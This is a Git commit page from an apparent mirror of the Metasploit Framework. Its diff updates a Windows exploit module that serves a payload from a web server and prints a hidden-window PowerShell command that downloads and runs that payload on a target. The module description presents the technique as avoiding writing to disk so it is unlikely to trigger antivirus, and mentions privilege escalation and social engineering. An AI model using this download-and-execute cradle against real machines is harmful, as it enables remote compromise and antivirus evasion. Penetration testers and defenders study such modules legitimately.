infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Final updates and tidy

bug/bundler_fix
Meatballs 2013-07-24 17:28:19 +01:00
parent fe405d2187
commit 18ac83bec1
1 changed files with 16 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/exploits/windows/misc/powershell_http_deliver.rb → modules/exploits/windows/misc/psh_web_delivery.rb
View File

@ -14,14 +14,19 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Powershell HTTP Downloader',
'Name' => 'Powershell HTTP Download Delivery',
'Description' => %q{
Quickly fires up a web server that serves the payload in powershell.
Two commands are given, the first will download and execute the payload
from within a powershell terminal. The second will start powershell and
then download and execute the payload. The main goal of this module is
so that a session can be quickly established on a target machine when
you have to manually type in the command yourself.
The command will start powershell and then download and execute the payload.
You can extract the IEX command to execute directly from powershell.
The main goal of this module is that a session can be quickly established
on a target machine when you have to manually type in the command yourself,
e.g. RDP Session, Local Access or maybe Remote Command Exec.
This does not write to disk so is unlikely to trigger AV solutions and will
allow you to attempt local privilege escalations supplied by meterpreter etc.
You could also try your luck with social engineering.
Ensure your payload architecture matches the target computer or use SYSWOW64
powershell.exe to execute x86 payloads on x64 machines.
},
'License' => MSF_LICENSE,
'Author' =>
@ -47,19 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Delivering Payload")
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
def exploit
datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)
url = (datastore['SSL'] ? "https://" : "http://")
url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
def primer
url = get_uri()
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
print_good(download_and_run)
print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
print_line
super
print_status("Run the following command on the target machine:")
print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
end
end